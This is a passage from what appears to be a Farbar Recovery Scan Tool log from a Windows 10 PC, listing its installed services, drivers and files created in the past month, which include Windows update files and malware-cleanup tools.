(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AMD_RAIDXpert; C:\Program Files (x86)\AMD\RAIDXpert\bin\RAIDXpertService.exe [122880 2009-12-15] (AMD) [File not signed]
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77128 2015-01-19] (Apple Inc.)
S2 CLKMSVC10_C6F09094; C:\Program Files (x86)\Hewlett-Packard\Media\DVD\Kernel\HDDVD\NavFilter\kmsvc.exe [245232 2010-11-26] (CyberLink)
R2 DokanMounter; C:\Program Files (x86)\Dokan\DokanLibrary\mounter.exe [11776 2012-05-18] () [File not signed]
R2 Garmin Device Interaction Service; C:\Program Files (x86)\Garmin\Device Interaction Service\GarminService.exe [708616 2015-04-08] (Garmin Ltd. or its subsidiaries)
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1163200 2016-01-22] (NVIDIA Corporation)
R2 GoProDeviceDetectionService; C:\Program Files\GoPro\GoPro Desktop App\GoProDeviceDetection.exe [37808 2016-05-12] ()
R2 HP Support Assistant Service; C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe [86528 2012-09-27] (Hewlett-Packard Company) [File not signed]
R2 LightScribeService; c:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe [73728 2010-11-22] (Hewlett-Packard Company) [File not signed]
R2 MySQL; C:\Program Files\MySQL\MySQL Server 5.6\bin\mysqld.exe [12907520 2013-02-01] () [File not signed]
R2 N360; C:\Program Files (x86)\Norton 360\Engine\22.8.0.50\N360.exe [289080 2016-09-23] (Symantec Corporation)
R2 NOBU; C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe [2804568 2010-06-01] (Symantec Corporation)
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1879488 2016-01-22] (NVIDIA Corporation)
R3 NvStreamNetworkSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe [6308288 2016-01-22] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [4812736 2016-01-22] (NVIDIA Corporation)
R2 pdfcDispatcher; C:\Program Files (x86)\PDF Complete\pdfsvc.exe [1128952 2011-05-06] (PDF Complete Inc)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [303360 2015-06-24] (Realtek Semiconductor)
R2 Seagate Dashboard Services; C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\Seagate.Dashboard.DASWindowsService.exe [16216 2016-04-05] (Seagate Technology LLC)
R2 Seagate MobileBackup Service; C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\MobileService.exe [143656 2016-04-05] (Seagate Technology LLC)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103720 2016-07-16] (Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 BHDrvx64; C:\Program Files (x86)\Norton 360\NortonData\22.5.0.124\Definitions\BASHDefs\20161027.001\BHDrvx64.sys [1854712 2016-08-18] (Symantec Corporation)
R1 ccSet_N360; C:\WINDOWS\system32\drivers\N360x64\1608000.032\ccSetx64.sys [174328 2016-06-01] (Symantec Corporation)
R2 Dokan; C:\WINDOWS\system32\drivers\dokan.sys [106888 2012-05-18] (Windows ® Win 7 DDK provider)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [497368 2016-10-08] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [156888 2016-10-08] (Symantec Corporation)
R3 HCW723x; C:\WINDOWS\system32\DRIVERS\HCW723x.sys [1847680 2012-08-17] (Hauppauge Computer Works, Inc.)
S3 hcw85cir; C:\WINDOWS\system32\drivers\hcw85cir3.sys [32768 2009-09-11] (Hauppauge Computer Works, Inc.)
R1 IDSVia64; C:\Program Files (x86)\Norton 360\NortonData\22.5.0.124\Definitions\IPSDefs\20161028.001\IDSvia64.sys [1012952 2016-10-29] (Symantec Corporation)
S0 megasas2i; C:\WINDOWS\System32\drivers\MegaSas2i.sys [64352 2016-10-05] (Avago Technologies)
S3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] ()
R2 npf; C:\WINDOWS\system32\drivers\npf.sys [36600 2015-10-12] (Riverbed Technology, Inc.)
R3 nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nvhdcwu.inf_amd64_16f6c9b501baeb7d\nvlddmkm.sys [13754928 2016-08-27] (NVIDIA Corporation)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [26560 2016-01-22] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\WINDOWS\system32\drivers\nvvad64v.sys [47760 2015-12-18] (NVIDIA Corporation)
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [589824 2016-07-16] (Realtek                                            )
R1 SRTSP; C:\WINDOWS\System32\Drivers\N360x64\1608000.032\SRTSP64.SYS [784624 2016-09-23] (Symantec Corporation)
R1 SRTSPX; C:\WINDOWS\system32\drivers\N360x64\1608000.032\SRTSPX64.SYS [49400 2016-09-23] (Symantec Corporation)
R0 SymEFASI; C:\WINDOWS\System32\drivers\N360x64\1608000.032\SYMEFASI64.SYS [1628888 2016-09-23] (Symantec Corporation)
S0 SymELAM; C:\WINDOWS\System32\drivers\N360x64\1608000.032\SymELAM.sys [24192 2015-07-10] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [100592 2016-10-16] (Symantec Corporation)
R1 SymIRON; C:\WINDOWS\system32\drivers\N360x64\1608000.032\Ironx64.SYS [289520 2016-09-23] (Symantec Corporation)
R1 SymNetS; C:\WINDOWS\System32\Drivers\N360x64\1608000.032\SYMNETS.SYS [567512 2016-09-23] (Symantec Corporation)
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)
U3 idsvc; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-10-30 18:31 - 2016-10-30 18:33 - 00031269 _____ C:\Users\Harold\Desktop\FRST.txt
2016-10-30 18:31 - 2016-10-30 18:31 - 00000000 ____D C:\FRST
2016-10-30 18:29 - 2016-10-30 18:31 - 02408448 _____ (Farbar) C:\Users\Harold\Desktop\FRST64.exe
2016-10-30 17:33 - 2016-10-30 17:33 - 06761600 _____ (ESET spol. s r.o.) C:\Users\Harold\Downloads\esetonlinescanner_enu.exe
2016-10-30 17:33 - 2016-10-30 17:33 - 00000000 ____D C:\Users\Harold\AppData\Local\ESET
2016-10-30 17:28 - 2016-10-30 17:30 - 02744744 _____ (Symantec Corporation) C:\Users\Harold\Desktop\FixTool64.exe
2016-10-30 17:20 - 2016-10-30 18:03 - 00003810 _____ C:\Users\Harold\Desktop\Rkill.txt
2016-10-30 17:18 - 2016-10-30 17:20 - 02030536 _____ (Bleeping Computer, LLC) C:\Users\Harold\Desktop\iExplore.exe
2016-10-29 14:22 - 2016-10-15 00:48 - 00498952 _____ (Microsoft Corporation) C:\WINDOWS\system32\DolbyDecMFT.dll
2016-10-29 14:22 - 2016-10-15 00:26 - 22224480 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-10-29 14:22 - 2016-10-15 00:26 - 04129928 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2016-10-29 14:22 - 2016-10-15 00:26 - 01990648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2016-10-29 14:22 - 2016-10-15 00:26 - 01472536 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfplat.dll
2016-10-29 14:22 - 2016-10-15 00:26 - 01062480 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2016-10-29 14:22 - 2016-10-15 00:22 - 01418312 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2016-10-29 14:22 - 2016-10-15 00:22 - 00628040 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2016-10-29 14:22 - 2016-10-15 00:15 - 01557808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll
2016-10-29 14:22 - 2016-10-15 00:11 - 01263848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2016-10-29 14:22 - 2016-10-14 23:53 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2016-10-29 14:22 - 2016-10-14 23:52 - 06285312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2016-10-29 14:22 - 2016-10-14 23:48 - 03778560 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2016-10-29 14:22 - 2016-10-14 23:41 - 12174848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-10-29 14:22 - 2016-10-14 23:40 - 13081600 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-10-29 14:22 - 2016-10-14 23:39 - 00982528 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll
2016-10-29 14:22 - 2016-10-14 23:38 - 07468032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2016-10-29 14:22 - 2016-10-14 23:37 - 08075776 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2016-10-29 14:22 - 2016-10-14 23:36 - 03617792 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-10-29 14:22 - 2016-10-14 23:36 - 01880576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
2016-10-29 14:22 - 2016-08-27 01:12 - 00244816 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll
2016-10-29 14:21 - 2016-10-15 00:51 - 01051112 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2016-10-29 14:21 - 2016-10-15 00:51 - 00894088 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2016-10-29 14:21 - 2016-10-15 00:48 - 07817568 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-10-29 14:21 - 2016-10-15 00:48 - 01354320 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2016-10-29 14:21 - 2016-10-15 00:48 - 01173496 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2016-10-29 14:21 - 2016-10-15 00:48 - 00773712 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2016-10-29 14:21 - 2016-10-15 00:47 - 01883784 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2016-10-29 14:21 - 2016-10-15 00:37 - 00063328 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dam.sys
2016-10-29 14:21 - 2016-10-15 00:33 - 00455040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DolbyDecMFT.dll
2016-10-29 14:21 - 2016-10-15 00:26 - 04673304 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2016-10-29 14:21 - 2016-10-15 00:26 - 01274712 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2016-10-29 14:21 - 2016-10-15 00:26 - 00811416 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFCaptureEngine.dll
2016-10-29 14:21 - 2016-10-15 00:26 - 00691080 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvproc.dll
2016-10-29 14:21 - 2016-10-15 00:22 - 01608896 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d9.dll
2016-10-29 14:21 - 2016-10-15 00:22 - 01461200 _____ (Microsoft Corporation) C:\WINDOWS\system32\user32.dll
2016-10-29 14:21 - 2016-10-15 00:18 - 00749920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\drvstore.dll
2016-10-29 14:21 - 2016-10-15 00:18 - 00576400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2016-10-29 14:21 - 2016-10-15 00:18 - 00186424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\weretw.dll
2016-10-29 14:21 - 2016-10-15 00:15 - 20969928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2016-10-29 14:21 - 2016-10-15 00:11 - 01424488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d9.dll
2016-10-29 14:21 - 2016-10-15 00:01 - 01631232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Resources.dll
2016-10-29 14:21 - 2016-10-15 00:00 - 00018432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\stdole2.tlb
2016-10-29 14:21 - 2016-10-14 23:58 - 00258560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xboxgip.sys
2016-10-29 14:21 - 2016-10-14 23:57 - 00186880 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2016-10-29 14:21 - 2016-10-14 23:56 - 00095232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BluetoothApis.dll
2016-10-29 14:21 - 2016-10-14 23:56 - 00081408 _____ (Microsoft Corporation) C:\WINDOWS\system32\HttpsDataSource.dll
2016-10-29 14:21 - 2016-10-14 23:55 - 00567296 _____ (Microsoft Corporation) C:\WINDOWS\system32\DevicePairing.dll
2016-10-29 14:21 - 2016-10-14 23:55 - 00236544 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Flights.dll
2016-10-29 14:21 - 2016-10-14 23:55 - 00182784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsensorgroup.dll
2016-10-29 14:21 - 2016-10-14 23:54 - 00717312 _____ (Microsoft Corporation) C:\WINDOWS\system32\taskbarcpl.dll
2016-10-29 14:21 - 2016-10-14 23:54 - 00555008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
2016-10-29 14:21 - 2016-10-14 23:54 - 00217088 _____ (Microsoft Corporation) C:\WINDOWS\system32\DevicePairingFolder.dll
2016-10-29 14:21 - 2016-10-14 23:54 - 00211456 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2016-10-29 14:21 - 2016-10-14 23:54 - 00179712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2016-10-29 14:21 - 2016-10-14 23:54 - 00043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\TpmTasks.dll
2016-10-29 14:21 - 2016-10-14 23:53 - 00744448 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
2016-10-29 14:21 - 2016-10-14 23:53 - 00240640 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkDesktopSettings.dll
2016-10-29 14:21 - 2016-10-14 23:53 - 00222720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
2016-10-29 14:21 - 2016-10-14 23:52 - 00274432 _____ (Microsoft Corporation) C:\WINDOWS\system32\ListSvc.dll
2016-10-29 14:21 - 2016-10-14 23:52 - 00163328 _____ (Microsoft Corporation) C:\WINDOWS\system32\autoplay.dll
2016-10-29 14:21 - 2016-10-14 23:50 - 17188352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2016-10-29 14:21 - 2016-10-14 23:50 - 00509440 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_Bluetooth.dll
2016-10-29 14:21 - 2016-10-14 23:50 - 00074752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\updatepolicy.dll
2016-10-29 14:21 - 2016-10-14 23:49 - 09131008 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-10-29 14:21 - 2016-10-14 23:49 - 00495104 _____ (Microsoft Corporation) C:\WINDOWS\system32\DataSenseHandlers.dll
2016-10-29 14:21 - 2016-10-14 23:49 - 00187904 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscsvc.dll
2016-10-29 14:21 - 2016-10-14 23:48 - 01323008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_fs.dll
2016-10-29 14:21 - 2016-10-14 23:47 - 01113600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsp_health.dll
2016-10-29 14:21 - 2016-10-14 23:47 - 00558080 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnprv.dll
2016-10-29 14:21 - 2016-10-14 23:46 - 00471552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.BackgroundMediaPlayback.dll
2016-10-29 14:21 - 2016-10-14 23:45 - 00406016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2016-10-29 14:21 - 2016-10-14 23:44 - 00747008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\RemoteNaturalLanguage.dll
2016-10-29 14:21 - 2016-10-14 23:44 - 00470016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Playback.BackgroundMediaPlayer.dll
2016-10-29 14:21 - 2016-10-14 23:44 - 00465920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LockAppBroker.dll
2016-10-29 14:21 - 2016-10-14 23:44 - 00090112 _____ (Microsoft Corporation) C:\WINDOWS\system32\powercfg.exe
2016-10-29 14:21 - 2016-10-14 23:43 - 00574976 _____ (Microsoft Corporation) C:\WINDOWS\system32\energy.dll
2016-10-29 14:21 - 2016-10-14 23:42 - 00539136 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2016-10-29 14:21 - 2016-10-14 23:42 - 00459776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Playback.MediaPlayer.dll
2016-10-29 14:21 - 2016-10-14 23:42 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2016-10-29 14:21 - 2016-10-14 23:42 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll
2016-10-29 14:21 - 2016-10-14 23:41 - 00940032 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontext.dll
2016-10-29 14:21 - 2016-10-14 23:41 - 00655872 _____ (Microsoft Corporation) C:\WINDOWS\system32\sud.dll
2016-10-29 14:21 - 2016-10-14 23:41 - 00496128 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.UserAccountsHandlers.dll
2016-10-29 14:21 - 2016-10-14 23:41 - 00067584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iscsiwmi.dll
2016-10-29 14:21 - 2016-10-14 23:39 - 04749312 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2016-10-29 14:21 - 2016-10-14 23:39 - 03400192 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncCenter.dll
2016-10-29 14:21 - 2016-10-14 23:39 - 01228288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\usercpl.dll
2016-10-29 14:21 - 2016-10-14 23:39 - 00079360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll
2016-10-29 14:21 - 2016-10-14 23:38 - 01993216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2016-10-29 14:21 - 2016-10-14 23:38 - 00913920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.dll
2016-10-29 14:21 - 2016-10-14 23:38 - 00828416 _____ (Microsoft Corporation) C:\WINDOWS\system32\appwiz.cpl
2016-10-29 14:21 - 2016-10-14 23:37 - 02611200 _____ (Microsoft Corporation) C:\WINDOWS\system32\gameux.dll
2016-10-29 14:21 - 2016-10-14 23:37 - 01643008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Speech.dll
2016-10-29 14:21 - 2016-10-14 23:36 - 02512384 _____ (Microsoft Corporation) C:\WINDOWS\system32\themecpl.dll
2016-10-29 14:21 - 2016-10-14 23:36 - 02290176 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2016-10-29 14:21 - 2016-10-14 23:36 - 00629248 _____ (Microsoft Corporation) C:\WINDOWS\system32\hgcpl.dll
2016-10-29 14:21 - 2016-10-14 23:36 - 00347136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Display.dll
2016-10-29 14:21 - 2016-10-14 23:36 - 00338944 _____ (Microsoft Corporation) C:\WINDOWS\system32\fhcpl.dll
2016-10-29 14:21 - 2016-10-14 23:36 - 00081408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cmifw.dll
2016-10-29 14:21 - 2016-10-14 23:35 - 00772608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntshrui.dll
2016-10-29 14:21 - 2016-10-14 23:35 - 00701952 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.Connectivity.dll
2016-10-29 14:21 - 2016-10-14 23:35 - 00391168 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2016-10-29 14:21 - 2016-10-14 23:35 - 00389632 _____ (Microsoft Corporation) C:\WINDOWS\system32\stobject.dll
2016-10-29 14:21 - 2016-10-14 23:34 - 00842240 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntshrui.dll
2016-10-29 14:21 - 2016-10-14 23:31 - 00227328 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ahcache.sys
2016-10-29 14:21 - 2016-09-10 09:21 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\capimg.sys
2016-10-29 14:20 - 2016-10-15 01:11 - 00484584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2016-10-29 14:20 - 2016-10-15 00:51 - 02186896 _____ (Microsoft Corporation) C:\WINDOWS\system32\hevcdecoder.dll
2016-10-29 14:20 - 2016-10-15 00:51 - 01637728 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2016-10-29 14:20 - 2016-10-15 00:51 - 01235296 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2016-10-29 14:20 - 2016-10-15 00:51 - 00595296 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2016-10-29 14:20 - 2016-10-15 00:51 - 00590960 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2016-10-29 14:20 - 2016-10-15 00:51 - 00584032 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2016-10-29 14:20 - 2016-10-15 00:51 - 00322912 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2016-10-29 14:20 - 2016-10-15 00:51 - 00283488 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2016-10-29 14:20 - 2016-10-15 00:51 - 00232800 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
2016-10-29 14:20 - 2016-10-15 00:51 - 00137568 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2016-10-29 14:20 - 2016-10-15 00:51 - 00078688 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2016-10-29 14:20 - 2016-10-15 00:43 - 01356352 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipUp.exe
2016-10-29 14:20 - 2016-10-15 00:41 - 05622088 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppsvc.exe
2016-10-29 14:20 - 2016-10-15 00:38 - 00500064 _____ (Microsoft Corporation) C:\WINDOWS\system32\pcasvc.dll
2016-10-29 14:20 - 2016-10-15 00:34 - 01969912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hevcdecoder.dll
2016-10-29 14:20 - 2016-10-15 00:32 - 01570680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2016-10-29 14:20 - 2016-10-15 00:31 - 02827864 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d11.dll
2016-10-29 14:20 - 2016-10-15 00:30 - 01851696 _____ (Microsoft Corporation) C:\WINDOWS\system32\crypt32.dll
2016-10-29 14:20 - 2016-10-15 00:30 - 00682816 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2016-10-29 14:20 - 2016-10-15 00:30 - 00509280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storport.sys
2016-10-29 14:20 - 2016-10-15 00:30 - 00341936 _____ (Microsoft Corporation) C:\WINDOWS\system32\wintrust.dll
2016-10-29 14:20 - 2016-10-15 00:30 - 00238056 _____ (Microsoft Corporation) C:\WINDOWS\system32\weretw.dll
2016-10-29 14:20 - 2016-10-15 00:29 - 02913104 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2016-10-29 14:20 - 2016-10-15 00:29 - 01267504 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2016-10-29 14:20 - 2016-10-15 00:29 - 00908640 _____ (Microsoft Corporation) C:\WINDOWS\system32\drvstore.dll
2016-10-29 14:20 - 2016-10-15 00:29 - 00079200 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\crashdmp.sys
2016-10-29 14:20 - 2016-10-15 00:26 - 01600632 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
2016-10-29 14:20 - 2016-10-15 00:26 - 00534096 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEng.dll
2016-10-29 14:20 - 2016-10-15 00:25 - 00882680 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeManagerObj.dll
2016-10-29 14:20 - 2016-10-15 00:25 - 00742704 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppwinob.dll
2016-10-29 14:20 - 2016-10-15 00:21 - 00292872 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpeffects.dll
2016-10-29 14:20 - 2016-10-15 00:19 - 02256592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2016-10-29 14:20 - 2016-10-15 00:15 - 00959112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2016-10-29 14:20 - 2016-10-15 00:14 - 04311736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2016-10-29 14:20 - 2016-10-15 00:11 - 00545944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2016-10-29 14:20 - 2016-10-15 00:10 - 00254656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmpeffects.dll
2016-10-29 14:20 - 2016-10-15 00:06 - 05685760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2016-10-29 14:20 - 2016-10-15 00:05 - 07216640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2016-10-29 14:20 - 2016-10-15 00:00 - 01631232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll
2016-10-29 14:20 - 2016-10-15 00:00 - 00048640 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
2016-10-29 14:20 - 2016-10-14 23:59 - 00272384 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfksproxy.dll
2016-10-29 14:20 - 2016-10-14 23:59 - 00187904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfksproxy.dll
2016-10-29 14:20 - 2016-10-14 23:59 - 00130560 _____ (Microsoft Corporation) C:\WINDOWS\splwow64.exe
2016-10-29 14:20 - 2016-10-14 23:58 - 00040448 _____ (Microsoft Corporation) C:\WINDOWS\system32\efsext.dll
2016-10-29 14:20 - 2016-10-14 23:58 - 00032768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\efsext.dll
2016-10-29 14:20 - 2016-10-14 23:57 - 00217600 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpdxm.dll
2016-10-29 14:20 - 2016-10-14 23:57 - 00175104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmpdxm.dll
2016-10-29 14:20 - 2016-10-14 23:57 - 00039424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dtdump.exe
2016-10-29 14:20 - 2016-10-14 23:56 - 00339968 _____ (Microsoft Corporation) C:\WINDOWS\system32\esentutl.exe
2016-10-29 14:20 - 2016-10-14 23:56 - 00306688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\esentutl.exe
2016-10-29 14:20 - 2016-10-14 23:56 - 00193536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.WiFi.dll
2016-10-29 14:20 - 2016-10-14 23:56 - 00120832 _____ (Microsoft Corporation) C:\WINDOWS\system32\BluetoothApis.dll
2016-10-29 14:20 - 2016-10-14 23:56 - 00098816 _____ (Microsoft Corporation) C:\WINDOWS\system32\BthRadioMedia.dll
2016-10-29 14:20 - 2016-10-14 23:56 - 00065024 _____ (Microsoft Corporation) C:\WINDOWS\system32\OnDemandConnRouteHelper.dll
